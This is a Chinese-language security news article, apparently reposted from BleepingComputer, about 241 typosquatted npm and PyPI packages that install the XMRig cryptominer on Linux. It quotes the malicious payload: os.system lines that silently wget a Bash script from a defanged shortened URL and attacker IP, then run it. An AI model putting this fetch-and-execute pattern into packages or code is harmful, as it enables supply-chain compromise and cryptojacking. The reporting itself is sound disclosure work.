本周已发现 200 多个恶意程序包渗透到 PyPI 和 npm 开源注册表中。
这些包主要是广泛使用的库的仿冒品,每个包都在运行加密矿工的 Linux 系统上下载 Bash 脚本。
PyPI,npm 充斥着加密货币包
研究人员已经捕获了至少 241 个恶意 npm 和 PyPI 包,这些包在感染 Linux 机器后会丢弃密码矿工。
这些包是流行的开源库和命令(如React、argparse和 AIOHTTP )的仿冒品,而是从威胁参与者的服务器下载并安装加密 Bash 脚本。
周三,软件开发人员和研究员 Hauke Lübbers 分享了在 PyPI 上 遇到的“至少 33 个项目”,这些项目都在感染系统后启动了开源门罗币加密矿工 XMRig 。
55 个带有密码矿工的仿冒域名泛滥 PyPI (Hauke Lübbers)
当研究人员正在向 PyPI 管理员报告这 33 个恶意项目时,他注意到攻击者开始发布另一组具有相同恶意负载的 22 个包。
“在我将它们报告给 PyPI 后,它们很快被删除了——但恶意行为者仍在上传更多包的过程中,并上传了另外 22 个包,”Lübbers 告诉 BleepingComputer。
“这些软件包针对 Linux 系统并安装了加密挖掘软件 XMRig,”软件工程师解释道。
Python 包包含以下代码,该代码通过 Bit.ly URL 缩短器从威胁参与者的服务器下载 Bash 脚本。
os.system(“sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1”)
os.system(“chmod +x .cmc >/dev/ null 2>&1”)
os.system(“./.cmc >/dev/null 2>&1”)
研究人员解释了 Bit[.]ly URL 重定向到托管在 80.78.25[.]140:8000 上的脚本。
“这是通过从http://80.78.25[.]140:8000/.cmc 下载并执行 Bash 脚本来完成的”
执行后,该脚本会通知威胁参与者受感染主机的 IP 地址以及加密矿工的部署是否成功。
在撰写本文时,我们观察到 IP 地址已关闭。但是,BleepingComputer 能够获得脚本的副本,我们能够证实研究人员的说法:
摘自安装加密矿工的 Bash 脚本 (BleepingComputer)
我所在的 Sonatype 安全研究团队今天披露了另外 186 个 npm 域名抢注包 ,它们通过相同的 URL 联系以下载恶意 Bash 脚本。
npm 包从同一个 URL 中提取恶意代码(Sonatype)
似乎两个注册机构都很快从他们的平台上清除了仿冒域名,以免对开发人员造成更大的伤害。
尽管有各种安全增强功能,例如强制对关键项目进行双重身份验证和引入新功能(例如 Python 的setuptools 正在取代 setup.py),但开源存储库与威胁参与者的竞争似乎只会变得更具挑战性。
上周,软件安全公司 Checkmarx 报告发现十几个恶意 Python 包对 Counter-Strike 服务器执行 DDoS 攻击。
本月早些时候,网络安全公司 CheckPoint 公开了10 个恶意 PyPI 包,这些包被发现窃取了开发人员的凭据。
7 月,ReversingLabs 研究人员披露了一种名为IconBurst的供应链攻击 ,该攻击再次利用域名抢注来感染开发人员。
转载请注明:VPS资讯_海外云服务器资讯_海外服务器资讯_IDC新闻 » 241个npm和PyPI包被发现丢弃了Linux加密矿工
